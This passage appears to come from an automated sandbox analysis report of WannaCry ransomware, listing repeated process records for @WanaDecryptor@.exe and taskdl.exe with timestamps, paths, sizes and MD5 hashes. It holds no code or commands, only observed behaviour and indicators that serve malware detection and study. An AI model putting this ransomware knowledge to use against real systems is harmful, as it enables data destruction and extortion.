                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:93
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:94
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:95
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:96
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:98
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:99
                                                          Start time:11:59:42
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:100
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:102
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:103
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:104
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:105
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:106
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:107
                                                          Start time:11:59:43
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:108
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:109
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:111
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:112
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:113
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:114
                                                          Start time:11:59:44
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:115
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:116
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:117
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:118
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:119
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:120
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:121
                                                          Start time:11:59:45
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:122
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:123
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:124
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:125
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:126
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:127
                                                          Start time:11:59:46
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:128
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:129
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:130
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:131
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:132
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:133
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:134
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:135
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:136
                                                          Start time:11:59:47
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:137
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:138
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:139
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:140
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:141
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:142
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:143
                                                          Start time:11:59:48
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:144
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:145
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:146
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:147
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:148
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:149
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:150
                                                          Start time:11:59:49
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:151
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:152
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:153
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:154
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:155
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\taskdl.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:taskdl.exe
                                                          Imagebase:0x400000
                                                          File size:20'480 bytes
                                                          MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:156
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:157
                                                          Start time:11:59:50
                                                          Start date:16/01/2024
                                                          Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:@WanaDecryptor@.exe
                                                          Imagebase:0x400000
                                                          File size:245'760 bytes
                                                          MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:158
